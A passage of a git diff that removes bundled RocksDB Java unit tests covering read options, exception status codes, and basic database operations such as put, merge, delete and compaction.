-  public void failToCFWriteBatchReadOnly() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      //no-op
-    }
-
-    try (final ColumnFamilyOptions cfOpts = new ColumnFamilyOptions()) {
-      final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-          new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY, cfOpts)
-      );
-
-      final List<ColumnFamilyHandle> readOnlyColumnFamilyHandleList =
-          new ArrayList<>();
-      try (final RocksDB rDb = RocksDB.openReadOnly(
-          dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-          readOnlyColumnFamilyHandleList);
-           final WriteBatch wb = new WriteBatch();
-           final WriteOptions wOpts = new WriteOptions()) {
-        try {
-          wb.put(readOnlyColumnFamilyHandleList.get(0), "key".getBytes(),
-              "value".getBytes());
-          rDb.write(wOpts, wb);
-        } finally {
-          for (final ColumnFamilyHandle columnFamilyHandle :
-              readOnlyColumnFamilyHandleList) {
-            columnFamilyHandle.close();
-          }
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java
deleted file mode 100644
index da048c4..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ReadOptionsTest.java
+++ /dev/null
@@ -1,201 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.Random;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.ExpectedException;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ReadOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public ExpectedException exception = ExpectedException.none();
-
-  @Test
-  public void verifyChecksum() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setVerifyChecksums(boolValue);
-      assertThat(opt.verifyChecksums()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void fillCache() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFillCache(boolValue);
-      assertThat(opt.fillCache()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void tailing() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final boolean boolValue = rand.nextBoolean();
-      opt.setTailing(boolValue);
-      assertThat(opt.tailing()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void snapshot() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setSnapshot(null);
-      assertThat(opt.snapshot()).isNull();
-    }
-  }
-
-  @Test
-  public void readTier() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setReadTier(ReadTier.BLOCK_CACHE_TIER);
-      assertThat(opt.readTier()).isEqualTo(ReadTier.BLOCK_CACHE_TIER);
-    }
-  }
-
-  @Test
-  public void managed() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setManaged(true);
-      assertThat(opt.managed()).isTrue();
-    }
-  }
-
-  @Test
-  public void totalOrderSeek() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setTotalOrderSeek(true);
-      assertThat(opt.totalOrderSeek()).isTrue();
-    }
-  }
-
-  @Test
-  public void prefixSameAsStart() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setPrefixSameAsStart(true);
-      assertThat(opt.prefixSameAsStart()).isTrue();
-    }
-  }
-
-  @Test
-  public void pinData() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setPinData(true);
-      assertThat(opt.pinData()).isTrue();
-    }
-  }
-
-  @Test
-  public void backgroundPurgeOnIteratorCleanup() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setBackgroundPurgeOnIteratorCleanup(true);
-      assertThat(opt.backgroundPurgeOnIteratorCleanup()).isTrue();
-    }
-  }
-
-  @Test
-  public void readaheadSize() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      final Random rand = new Random();
-      final long longValue = rand.nextLong();
-      opt.setReadaheadSize(longValue);
-      assertThat(opt.readaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void ignoreRangeDeletions() {
-    try (final ReadOptions opt = new ReadOptions()) {
-      opt.setIgnoreRangeDeletions(true);
-      assertThat(opt.ignoreRangeDeletions()).isTrue();
-    }
-  }
-
-  @Test
-  public void failSetVerifyChecksumUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setVerifyChecksums(true);
-    }
-  }
-
-  @Test
-  public void failVerifyChecksumUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.verifyChecksums();
-    }
-  }
-
-  @Test
-  public void failSetFillCacheUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setFillCache(true);
-    }
-  }
-
-  @Test
-  public void failFillCacheUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.fillCache();
-    }
-  }
-
-  @Test
-  public void failSetTailingUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setTailing(true);
-    }
-  }
-
-  @Test
-  public void failTailingUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.tailing();
-    }
-  }
-
-  @Test
-  public void failSetSnapshotUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.setSnapshot(null);
-    }
-  }
-
-  @Test
-  public void failSnapshotUninitialized() {
-    try (final ReadOptions readOptions =
-             setupUninitializedReadOptions(exception)) {
-      readOptions.snapshot();
-    }
-  }
-
-  private ReadOptions setupUninitializedReadOptions(
-      ExpectedException exception) {
-    final ReadOptions readOptions = new ReadOptions();
-    readOptions.close();
-    exception.expect(AssertionError.class);
-    return readOptions;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
deleted file mode 100644
index d3bd4ec..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBExceptionTest.java
+++ /dev/null
@@ -1,115 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import org.rocksdb.Status.Code;
-import org.rocksdb.Status.SubCode;
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class RocksDBExceptionTest {
-
-  @Test
-  public void exception() {
-    try {
-      raiseException();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCode() {
-    try {
-      raiseExceptionWithStatusCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionNoMsgWithStatusCode() {
-    try {
-      raiseExceptionNoMsgWithStatusCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo(Code.NotSupported.name());
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCodeSubCode() {
-    try {
-      raiseExceptionWithStatusCodeSubCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.TimedOut);
-      assertThat(e.getStatus().getSubCode())
-          .isEqualTo(Status.SubCode.LockTimeout);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionNoMsgWithStatusCodeSubCode() {
-    try {
-      raiseExceptionNoMsgWithStatusCodeSubCode();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.TimedOut);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.LockTimeout);
-      assertThat(e.getStatus().getState()).isNull();
-      assertThat(e.getMessage()).isEqualTo(Code.TimedOut.name() +
-          "(" + SubCode.LockTimeout.name() + ")");
-      return;
-    }
-    fail();
-  }
-
-  @Test
-  public void exceptionWithStatusCodeState() {
-    try {
-      raiseExceptionWithStatusCodeState();
-    } catch(final RocksDBException e) {
-      assertThat(e.getStatus()).isNotNull();
-      assertThat(e.getStatus().getCode()).isEqualTo(Code.NotSupported);
-      assertThat(e.getStatus().getSubCode()).isEqualTo(SubCode.None);
-      assertThat(e.getStatus().getState()).isNotNull();
-      assertThat(e.getMessage()).isEqualTo("test message");
-      return;
-    }
-    fail();
-  }
-
-  private native void raiseException() throws RocksDBException;
-  private native void raiseExceptionWithStatusCode() throws RocksDBException;
-  private native void raiseExceptionNoMsgWithStatusCode() throws RocksDBException;
-  private native void raiseExceptionWithStatusCodeSubCode()
-      throws RocksDBException;
-  private native void raiseExceptionNoMsgWithStatusCodeSubCode()
-      throws RocksDBException;
-  private native void raiseExceptionWithStatusCodeState()
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java
deleted file mode 100644
index 8989474..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/RocksDBTest.java
+++ /dev/null
@@ -1,766 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.util.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-import static org.junit.Assert.fail;
-
-public class RocksDBTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void open() throws RocksDBException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(db).isNotNull();
-    }
-  }
-
-  @Test
-  public void open_opt() throws RocksDBException {
-    try (final Options opt = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      assertThat(db).isNotNull();
-    }
-  }
-
-  @Test
-  public void openWhenOpen() throws RocksDBException {
-    final String dbPath = dbFolder.getRoot().getAbsolutePath();
-
-    try (final RocksDB db1 = RocksDB.open(dbPath)) {
-      try (final RocksDB db2 = RocksDB.open(dbPath)) {
-        fail("Should have thrown an exception when opening the same db twice");
-      } catch (final RocksDBException e) {
-        assertThat(e.getStatus().getCode()).isEqualTo(Status.Code.IOError);
-        assertThat(e.getStatus().getSubCode()).isEqualTo(Status.SubCode.None);
-        assertThat(e.getStatus().getState()).contains("lock ");
-      }
-    }
-  }
-
-  @Test
-  public void put() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions opt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put(opt, "key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-    }
-  }
-
-  @Test
-  public void write() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options options = new Options()
-             .setMergeOperator(stringAppendOperator)
-             .setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions opts = new WriteOptions()) {
-
-      try (final WriteBatch wb1 = new WriteBatch()) {
-        wb1.put("key1".getBytes(), "aa".getBytes());
-        wb1.merge("key1".getBytes(), "bb".getBytes());
-
-        try (final WriteBatch wb2 = new WriteBatch()) {
-          wb2.put("key2".getBytes(), "xx".getBytes());
-          wb2.merge("key2".getBytes(), "yy".getBytes());
-          db.write(opts, wb1);
-          db.write(opts, wb2);
-        }
-      }
-
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "aa,bb".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "xx,yy".getBytes());
-    }
-  }
-
-  @Test
-  public void getWithOutValue() throws RocksDBException {
-    try (final RocksDB db =
-             RocksDB.open(dbFolder.getRoot().getAbsolutePath())) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      byte[] outValue = new byte[5];
-      // not found value
-      int getResult = db.get("keyNotFound".getBytes(), outValue);
-      assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-      // found value which fits in outValue
-      getResult = db.get("key1".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("value".getBytes());
-      // found value which fits partially
-      getResult = db.get("key2".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("12345".getBytes());
-    }
-  }
-
-  @Test
-  public void getWithOutValueReadOptions() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final ReadOptions rOpt = new ReadOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      byte[] outValue = new byte[5];
-      // not found value
-      int getResult = db.get(rOpt, "keyNotFound".getBytes(),
-          outValue);
-      assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-      // found value which fits in outValue
-      getResult = db.get(rOpt, "key1".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("value".getBytes());
-      // found value which fits partially
-      getResult = db.get(rOpt, "key2".getBytes(), outValue);
-      assertThat(getResult).isNotEqualTo(RocksDB.NOT_FOUND);
-      assertThat(outValue).isEqualTo("12345".getBytes());
-    }
-  }
-
-  @Test
-  public void multiGet() throws RocksDBException, InterruptedException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final ReadOptions rOpt = new ReadOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      List<byte[]> lookupKeys = new ArrayList<>();
-      lookupKeys.add("key1".getBytes());
-      lookupKeys.add("key2".getBytes());
-      Map<byte[], byte[]> results = db.multiGet(lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes(), "12345678".getBytes());
-      // test same method with ReadOptions
-      results = db.multiGet(rOpt, lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes(), "12345678".getBytes());
-
-      // remove existing key
-      lookupKeys.remove("key2".getBytes());
-      // add non existing key
-      lookupKeys.add("key3".getBytes());
-      results = db.multiGet(lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes());
-      // test same call with readOptions
-      results = db.multiGet(rOpt, lookupKeys);
-      assertThat(results).isNotNull();
-      assertThat(results.values()).isNotNull();
-      assertThat(results.values()).
-          contains("value".getBytes());
-    }
-  }
-
-  @Test
-  public void merge() throws RocksDBException {
-    try (final StringAppendOperator stringAppendOperator = new StringAppendOperator();
-         final Options opt = new Options()
-            .setCreateIfMissing(true)
-            .setMergeOperator(stringAppendOperator);
-         final WriteOptions wOpt = new WriteOptions();
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      db.put("key1".getBytes(), "value".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      // merge key1 with another value portion
-      db.merge("key1".getBytes(), "value2".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value,value2".getBytes());
-      // merge key1 with another value portion
-      db.merge(wOpt, "key1".getBytes(), "value3".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value,value2,value3".getBytes());
-      // merge on non existent key shall insert the value
-      db.merge(wOpt, "key2".getBytes(), "xxxx".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "xxxx".getBytes());
-    }
-  }
-
-  @Test
-  public void delete() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-      db.delete("key1".getBytes());
-      db.delete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void singleDelete() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo(
-          "value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo(
-          "12345678".getBytes());
-      db.singleDelete("key1".getBytes());
-      db.singleDelete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void singleDelete_nonExisting() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.singleDelete("key1".getBytes());
-      db.singleDelete(wOpt, "key2".getBytes());
-      assertThat(db.get("key1".getBytes())).isNull();
-      assertThat(db.get("key2".getBytes())).isNull();
-    }
-  }
-
-  @Test
-  public void deleteRange() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final WriteOptions wOpt = new WriteOptions()) {
-      db.put("key1".getBytes(), "value".getBytes());
-      db.put("key2".getBytes(), "12345678".getBytes());
-      db.put("key3".getBytes(), "abcdefg".getBytes());
-      db.put("key4".getBytes(), "xyz".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isEqualTo("12345678".getBytes());
-      assertThat(db.get("key3".getBytes())).isEqualTo("abcdefg".getBytes());
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-      db.deleteRange("key2".getBytes(), "key4".getBytes());
-      assertThat(db.get("key1".getBytes())).isEqualTo("value".getBytes());
-      assertThat(db.get("key2".getBytes())).isNull();
-      assertThat(db.get("key3".getBytes())).isNull();
-      assertThat(db.get("key4".getBytes())).isEqualTo("xyz".getBytes());
-    }
-  }
-
-  @Test
-  public void getIntProperty() throws RocksDBException {
-    try (
-        final Options options = new Options()
-            .setCreateIfMissing(true)
-            .setMaxWriteBufferNumber(10)
-            .setMinWriteBufferNumberToMerge(10);
-        final RocksDB db = RocksDB.open(options,
-            dbFolder.getRoot().getAbsolutePath());
-        final WriteOptions wOpt = new WriteOptions().setDisableWAL(true)
-    ) {
-      db.put(wOpt, "key1".getBytes(), "value1".getBytes());
-      db.put(wOpt, "key2".getBytes(), "value2".getBytes());
-      db.put(wOpt, "key3".getBytes(), "value3".getBytes());
-      db.put(wOpt, "key4".getBytes(), "value4".getBytes());
-      assertThat(db.getLongProperty("rocksdb.num-entries-active-mem-table"))
-          .isGreaterThan(0);
-      assertThat(db.getLongProperty("rocksdb.cur-size-active-mem-table"))
-          .isGreaterThan(0);
-    }
-  }
-
-  @Test
-  public void fullCompactRange() throws RocksDBException {
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setDisableAutoCompactions(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(4).
-        setWriteBufferSize(100 << 10).
-        setLevelZeroFileNumCompactionTrigger(3).
-        setTargetFileSizeBase(200 << 10).
-        setTargetFileSizeMultiplier(1).
-        setMaxBytesForLevelBase(500 << 10).
-        setMaxBytesForLevelMultiplier(1).
-        setDisableAutoCompactions(false);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.compactRange();
-    }
-  }
-
-  @Test
-  public void fullCompactRangeColumnFamily()
-      throws RocksDBException {
-    try (
-        final DBOptions opt = new DBOptions().
-            setCreateIfMissing(true).
-            setCreateMissingColumnFamilies(true);
-        final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-            setDisableAutoCompactions(true).
-            setCompactionStyle(CompactionStyle.LEVEL).
-            setNumLevels(4).
-            setWriteBufferSize(100 << 10).
-            setLevelZeroFileNumCompactionTrigger(3).
-            setTargetFileSizeBase(200 << 10).
-            setTargetFileSizeMultiplier(1).
-            setMaxBytesForLevelBase(500 << 10).
-            setMaxBytesForLevelMultiplier(1).
-            setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts));
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1));
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeys()
-      throws RocksDBException {
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setDisableAutoCompactions(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(4).
-        setWriteBufferSize(100 << 10).
-        setLevelZeroFileNumCompactionTrigger(3).
-        setTargetFileSizeBase(200 << 10).
-        setTargetFileSizeMultiplier(1).
-        setMaxBytesForLevelBase(500 << 10).
-        setMaxBytesForLevelMultiplier(1).
-        setDisableAutoCompactions(false);
-         final RocksDB db = RocksDB.open(opt,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.compactRange("0".getBytes(), "201".getBytes());
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysReduce()
-      throws RocksDBException {
-    try (
-        final Options opt = new Options().
-            setCreateIfMissing(true).
-            setDisableAutoCompactions(true).
-            setCompactionStyle(CompactionStyle.LEVEL).
-            setNumLevels(4).
-            setWriteBufferSize(100 << 10).
-            setLevelZeroFileNumCompactionTrigger(3).
-            setTargetFileSizeBase(200 << 10).
-            setTargetFileSizeMultiplier(1).
-            setMaxBytesForLevelBase(500 << 10).
-            setMaxBytesForLevelMultiplier(1).
-            setDisableAutoCompactions(false);
-        final RocksDB db = RocksDB.open(opt,
-            dbFolder.getRoot().getAbsolutePath())) {
-      // fill database with key/value pairs
-      byte[] b = new byte[10000];
-      for (int i = 0; i < 200; i++) {
-        rand.nextBytes(b);
-        db.put((String.valueOf(i)).getBytes(), b);
-      }
-      db.flush(new FlushOptions().setWaitForFlush(true));
-      db.compactRange("0".getBytes(), "201".getBytes(),
-          true, -1, 0);
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysColumnFamily()
-      throws RocksDBException {
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setDisableAutoCompactions(true).
-             setCompactionStyle(CompactionStyle.LEVEL).
-             setNumLevels(4).
-             setWriteBufferSize(100 << 10).
-             setLevelZeroFileNumCompactionTrigger(3).
-             setTargetFileSizeBase(200 << 10).
-             setTargetFileSizeMultiplier(1).
-             setMaxBytesForLevelBase(500 << 10).
-             setMaxBytesForLevelMultiplier(1).
-             setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      // open database
-      final List<ColumnFamilyHandle> columnFamilyHandles =
-          new ArrayList<>();
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1),
-              "0".getBytes(), "201".getBytes());
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeWithKeysReduceColumnFamily()
-      throws RocksDBException {
-    try (final DBOptions opt = new DBOptions().
-        setCreateIfMissing(true).
-        setCreateMissingColumnFamilies(true);
-         final ColumnFamilyOptions new_cf_opts = new ColumnFamilyOptions().
-             setDisableAutoCompactions(true).
-             setCompactionStyle(CompactionStyle.LEVEL).
-             setNumLevels(4).
-             setWriteBufferSize(100 << 10).
-             setLevelZeroFileNumCompactionTrigger(3).
-             setTargetFileSizeBase(200 << 10).
-             setTargetFileSizeMultiplier(1).
-             setMaxBytesForLevelBase(500 << 10).
-             setMaxBytesForLevelMultiplier(1).
-             setDisableAutoCompactions(false)
-    ) {
-      final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-          Arrays.asList(
-              new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-              new ColumnFamilyDescriptor("new_cf".getBytes(), new_cf_opts)
-          );
-
-      final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-      // open database
-      try (final RocksDB db = RocksDB.open(opt,
-          dbFolder.getRoot().getAbsolutePath(),
-          columnFamilyDescriptors,
-          columnFamilyHandles)) {
-        try {
-          // fill database with key/value pairs
-          byte[] b = new byte[10000];
-          for (int i = 0; i < 200; i++) {
-            rand.nextBytes(b);
-            db.put(columnFamilyHandles.get(1),
-                String.valueOf(i).getBytes(), b);
-          }
-          db.compactRange(columnFamilyHandles.get(1), "0".getBytes(),
-              "201".getBytes(), true, -1, 0);
-        } finally {
-          for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-            handle.close();
-          }
-        }
-      }
-    }
-  }
-
-  @Test
-  public void compactRangeToLevel()
-      throws RocksDBException, InterruptedException {
-    final int NUM_KEYS_PER_L0_FILE = 100;
-    final int KEY_SIZE = 20;
-    final int VALUE_SIZE = 300;
-    final int L0_FILE_SIZE =
-        NUM_KEYS_PER_L0_FILE * (KEY_SIZE + VALUE_SIZE);
-    final int NUM_L0_FILES = 10;
-    final int TEST_SCALE = 5;
-    final int KEY_INTERVAL = 100;
-    try (final Options opt = new Options().
-        setCreateIfMissing(true).
-        setCompactionStyle(CompactionStyle.LEVEL).
-        setNumLevels(5).
-        // a slightly bigger write buffer than L0 file
-        // so that we can ensure manual flush always
-        // go before background flush happens.
-            setWriteBufferSize(L0_FILE_SIZE * 2).
-        // Disable auto L0 -> L1 compaction
